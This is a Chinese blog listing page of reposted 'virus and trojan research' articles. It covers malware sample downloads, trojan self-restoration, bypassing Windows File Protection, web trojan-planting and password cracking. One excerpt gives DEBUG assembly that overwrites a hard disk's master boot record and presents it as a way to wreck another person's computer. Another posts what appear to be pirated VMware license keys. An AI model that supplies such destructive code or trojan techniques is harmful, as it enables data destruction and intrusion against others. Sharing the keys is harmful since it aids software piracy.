病毒&木马研究
The_IT_Crowd
这个作者很懒,什么都没留下…
展开
-
不定期更新最新流行病毒木马样本打包高速下载
http://www.gangsir.cn/article/1.htm#page=6转载 2012-06-15 11:11:31 · 5170 阅读 · 0 评论 -
教你使用dos指令把秘密文字藏在图片里
我们都知道DOS命令Copy的主要作用是复制文件,可是你是否知道,它还有一个作用是合并文件呢?一般情况下,它主要用于合并相同类型的文件,比如将两个文本文件合并为一个文本文件、将两个独立的MPEG视频文件合并为一个连续的视频文件等。那么,如果用它合并两个不同类型的文件,结果会怎样呢?笔者发现,巧妙地将一个文本文件合并到一个非文本文件中,可以实现隐藏秘密的作用。一起来看看吧。比如你转载 2012-06-19 16:00:45 · 677 阅读 · 0 评论 -
【转】解析木马复活技术-程序被删还会还原 作者:未知
分析者:Popluna转载请注明我在无聊之中看到一款源码,下来看以后发现程序会创建一个ShieldThread线程跟踪下去发现它会把自身读取到一个分配的内存空间,然后每个一段时间判断自身文件是否存在如果不存在就从内存中写出文件。具体代码如下//DWORD WINAPI ShieldThread(LPVOID lpParamter){ char转载 2012-06-19 16:13:44 · 583 阅读 · 0 评论 -
VMware Workstation 8.0.0 Build 471780 官方正式版发布
下载地址:http://115.com/file/dn0fu6zkVMware-workstation-full-8.0.0-471780.7zM149W-J031J-H8R8C-01CAH-24RPGMV4YN-0L38Q-2ZK60-XUA7K-AAZ18 5F0Z1-24057-DZX88-4L97K-1AV2N4Y03Y-FTLE1-EZNH0-MAAQ转载 2012-06-19 16:10:04 · 964 阅读 · 0 评论 -
绕过系统文件保护的另一种方法
起到系统文件保护作用的是sfc_os.dll这个文件他被注入到了Winlogon中我的思路就是在Winlogon中的进程找到这个DLL的线程然后挂起掉自然就失效了以下是Powerbasic写的源代码XPSP3通过测试#编译的EXE #暗淡#INCLUDE“Win32Api.inc” #包括“TlHelp32.inc的”转载 2012-06-18 11:09:29 · 1013 阅读 · 0 评论 -
挂马大全
转载请注明出处:孤水绕城 对于挂马大家肯定都不会陌生,关于如何跨站如何挂马的东东早已不再是什么高深的技术,即便是菜鸟一个也能玩的很熟练,不需要很高深的技术,对于挂马的技术现在公布的也无非也就那么几种。一:框架挂马二:js文件挂马 首先将以下代码document.write("");保存为xxx.js,则JS挂马代码为三:js变形加密 m转载 2012-06-17 14:16:43 · 1918 阅读 · 0 评论 -
<转>黑色工具
工具一:PasswordCrackers PasswordCrackers因其用途广泛而成为黑客使用的主流工具。实施口令破译攻击分为两步,第一步:攻击者首先从被攻击对象的计算机 里读出一个加密口令档案(大部分系统,包括WindowsNT及UNIX,他们把口令加密后储存在档案系统内,以便当用户登录时认证);第二步:攻击者以 字典为辅助工具,用PasswordCrackers开始尝试去破译口转载 2012-06-17 14:15:52 · 449 阅读 · 0 评论 -
《转》破坏硬盘主引导扇区
如果你有机会接触对方的电脑,无论是否是物理接触都可以,只要能在对方的电脑上运行下面这些代码,就可以破坏对方硬盘主引导扇区,象病毒一样厉害。方法是运行debug,然后输入: a100 movax,301 movbx,1000 movcx,1 movdx,80 int13 g=10010e转载 2012-06-17 14:08:55 · 628 阅读 · 0 评论 -
查杀黑客的隐藏程序一些高级工具软件
查杀黑客的隐藏程序还有一些高级工具软件可以选用,比如:SRENG2,ICESWORD,WSYSCHECK,XUETR,POWERTOOL,GMER,UNHOOKER等等转载 2012-06-27 18:08:10 · 1212 阅读 · 0 评论